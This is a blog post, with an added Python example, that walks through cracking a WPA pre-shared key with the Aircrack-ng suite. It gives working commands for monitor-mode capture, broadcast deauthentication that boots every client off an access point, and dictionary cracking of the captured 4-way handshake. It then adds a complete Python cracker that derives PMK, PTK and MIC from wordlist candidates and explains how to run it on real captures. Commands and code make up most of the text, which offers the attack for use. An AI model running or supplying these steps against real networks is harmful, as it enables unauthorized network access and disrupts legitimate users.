This blog post was originally published on John Tagita’s personal site, https://attackd0gz.com, on November 5, 2019. That post can be found here: https://attackd0gz.com/2019/11/05/how-to-crack-wifi-protected-access-wpa-pre-shared-key-psk/

This is going to be a short post on cracking a WPA pre-shared key (PSK) in order to gain access to a WiFi network. The key to accomplishing this is the Aircrack-ng suite, a complete set of tools for assessing WiFi network security. Their website offers plenty of ways to get support and ask questions (forum, GitHub, IRC: #aircrack-ng on Freenode).

The first thing to do is to figure out which interface on your machine is capable of WiFi communication. You can do that with the command

# iw dev

Once you have figured out which interface you will be using (wlan0 in our case) and put it into monitor mode with airmon-ng (airodump-ng and aireplay-ng do not work on a managed-mode interface, and recent Aircrack-ng versions rename the interface, typically to wlan0mon, when they do this), you can use the following command to view all networks present in the vicinity on the 2.4 GHz band:

# airodump-ng wlan0

So we can now see that there is only one SSID in range on the 2.4 GHz band, and it is operating on channel 6. The next step is to lock our interface to channel 6, capture every packet we can, and write them out under the file prefix "capture" (airodump-ng appends a sequence number, so the first capture file is capture-01.cap). IMPORTANT NOTE: you need to keep this capture running during the deauth sequence, or else you will not capture the 4-way handshake. We can do that using the following command:

# airodump-ng wlan0 -c 6 -w capture

This is awesome, and now we can also see a client connected to the AP. This attack depends on capturing the 4-way handshake, so we need the connected client to perform that handshake again. We force this by kicking the client off the network so that it has to re-authenticate: we send "de-auth" (deauthentication) frames to the broadcast address, essentially booting everyone off the network. In the command below, -0 selects the deauth attack, 100 is the number of deauth bursts to send (0 would keep sending until stopped), and -a is the BSSID of the AP; the interface must be on the AP's channel, which it is, since airodump-ng locked it to channel 6. This only works against networks that do not enforce Protected Management Frames (802.11w), which authenticate deauthentication frames. The command in our case is:

# aireplay-ng -0 100 -a A2:E9:68:D3:03:10 wlan0

So now we know that the client got disconnected from the network and had to re-authenticate. We captured the 4-way handshake with the airodump-ng command that was still running and wrote the entire sequence out under the "capture" prefix, and under the "Notes" column in the image below you can see that the output shows "EAPOL", which, according to Andrii K in the StackExchange reply here, "EAPoL is an authentication protocol which is also used in WPA/WPA2. Its utility is to authenticate a user and establish a shared data from which the future encryption key will be derived."

So now we are cleared hot to attempt to crack the PSK using the data we have captured to this point. aircrack-ng derives the PMK from each candidate passphrase in the wordlist and checks it against the MIC in the captured handshake, so the attack is entirely offline and its success depends only on the passphrase being in the wordlist. Use the following command to accomplish this:

# aircrack-ng -w 100-common-passwords.txt capture-01.cap

Boom. So we have cracked the WPA PSK and are now able to authenticate as a valid user to the WiFi access point.
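To make concrete what aircrack-ng is doing in that last step, here is a worked Python example, added here and not part of the original post or of the Aircrack-ng code. It derives the PMK from each wordlist candidate with PBKDF2-HMAC-SHA1 over the SSID, expands it with the 802.11i PRF-512 into the PTK, takes the first 16 bytes as the KCK, and recomputes the MIC over EAPOL message 2; a match means the candidate is the PSK. The handshake it cracks is constructed inside the script under a hypothetical passphrase (the SSID, client MAC, nonces and wordlist are all made up; only the AP BSSID is the one from the post), so it runs offline without a capture file.

```python
"""Offline WPA/WPA2-PSK dictionary attack against a 4-way handshake.

Added, self-contained example (not aircrack-ng code): builds a synthetic
handshake under a hypothetical passphrase, then recovers the passphrase
from a wordlist by recomputing PMK -> PTK -> KCK -> MIC.
"""
import hashlib
import hmac
import struct
from dataclasses import dataclass


@dataclass
class Handshake:
    ssid: str
    ap_mac: bytes    # 6 bytes, "AA" (authenticator address) in 802.11i terms
    sta_mac: bytes   # 6 bytes, "SPA" (supplicant address)
    anonce: bytes    # 32-byte ANonce from message 1 (AP -> client)
    snonce: bytes    # 32-byte SNonce from message 2 (client -> AP)
    eapol: bytes     # the full EAPOL-Key frame of message 2, MIC field filled in


# 4-byte 802.1X header + descriptor type(1) + key info(2) + key length(2)
# + replay counter(8) + nonce(32) + IV(16) + RSC(8) + key ID(8) = 81
MIC_OFFSET = 81
MIC_LEN = 16


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """IEEE 802.11i PRF-512: PTK = PRF(PMK, "Pairwise key expansion", min/max(MACs) || min/max(nonces))."""
    b = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    out = b""
    for i in range(4):  # 4 SHA1 outputs = 640 bits, enough for 512
        out += hmac.new(pmk, b"Pairwise key expansion" + b"\x00" + b + bytes([i]), hashlib.sha1).digest()
    return out[:64]


def kck_from_pmk(pmk: bytes, hs: Handshake) -> bytes:
    """The KCK (key confirmation key) is the first 128 bits of the PTK."""
    return prf_512(pmk, hs.ap_mac, hs.sta_mac, hs.anonce, hs.snonce)[:16]


def eapol_mic(kck: bytes, eapol: bytes) -> bytes:
    """MIC over the EAPOL frame with the MIC field zeroed.

    Key descriptor version (low 3 bits of key info): 1 = WPA/TKIP uses HMAC-MD5,
    2 = WPA2/CCMP uses HMAC-SHA1 truncated to 128 bits.
    """
    version = struct.unpack(">H", eapol[5:7])[0] & 0x0007
    zeroed = eapol[:MIC_OFFSET] + b"\x00" * MIC_LEN + eapol[MIC_OFFSET + MIC_LEN:]
    digest = hashlib.md5 if version == 1 else hashlib.sha1
    return hmac.new(kck, zeroed, digest).digest()[:MIC_LEN]


def crack_psk(hs: Handshake, wordlist):
    """Return the first wordlist entry whose derived MIC matches the capture, else None."""
    captured_mic = hs.eapol[MIC_OFFSET:MIC_OFFSET + MIC_LEN]
    for candidate in wordlist:
        candidate = candidate.strip()
        if not 8 <= len(candidate) <= 63:  # WPA passphrase length bounds; skip junk early
            continue
        kck = kck_from_pmk(pmk_from_passphrase(candidate, hs.ssid), hs)
        if hmac.compare_digest(eapol_mic(kck, hs.eapol), captured_mic):
            return candidate
    return None


def build_message2(ssid, passphrase, ap_mac, sta_mac, anonce, snonce) -> Handshake:
    """Construct a WPA2 (CCMP) EAPOL message 2 with a valid MIC for the given passphrase."""
    key_info = 0x010A  # version 2 (HMAC-SHA1), pairwise bit, MIC bit
    body = (bytes([2])                      # descriptor type: RSN
            + struct.pack(">H", key_info)
            + struct.pack(">H", 16)         # key length (CCMP)
            + struct.pack(">Q", 1)          # replay counter
            + snonce
            + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8   # IV, RSC, key ID
            + b"\x00" * MIC_LEN             # MIC placeholder
            + struct.pack(">H", 0))         # key data length (real frames carry the RSN IE here)
    eapol = bytes([2, 3]) + struct.pack(">H", len(body)) + body   # 802.1X v2, type 3 = EAPOL-Key
    hs = Handshake(ssid, ap_mac, sta_mac, anonce, snonce, eapol)
    mic = eapol_mic(kck_from_pmk(pmk_from_passphrase(passphrase, ssid), hs), eapol)
    hs.eapol = eapol[:MIC_OFFSET] + mic + eapol[MIC_OFFSET + MIC_LEN:]
    return hs


# Constructed sample, not captured data: hypothetical SSID, client MAC, nonces and passphrase.
SAMPLE_SSID = "attackd0gz-lab"
SAMPLE_PASSPHRASE = "correcthorse"
SAMPLE_AP_MAC = bytes.fromhex("a2e968d30310")    # the AP BSSID used in the post
SAMPLE_STA_MAC = bytes.fromhex("020000000001")   # hypothetical client
SAMPLE_HANDSHAKE = build_message2(SAMPLE_SSID, SAMPLE_PASSPHRASE, SAMPLE_AP_MAC,
                                  SAMPLE_STA_MAC, bytes(range(32)), bytes(range(32, 64)))
SAMPLE_WORDLIST = ["password", "123456", "letmein", "correcthorse", "qwertyuiop"]


def demo():
    return crack_psk(SAMPLE_HANDSHAKE, SAMPLE_WORDLIST)


if __name__ == "__main__":
    print("Recovered PSK:", demo())
```

The expensive part is the 4096-round PBKDF2 per candidate, which is exactly why aircrack-ng's speed is measured in keys per second and why a precomputed PMK table (or GPU cracking) only helps for a fixed SSID, since the SSID is the PBKDF2 salt. Feeding this a real capture only requires pulling the ANonce out of message 1 and the SNonce plus the complete EAPOL frame out of message 2 of the pcap; the MIC check already handles both WPA (HMAC-MD5) and WPA2 (HMAC-SHA1) key descriptor versions.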

For some further knowledge, you can read about a really cool jamming attack using the de-authentication command that Mike Szczys wrote about here.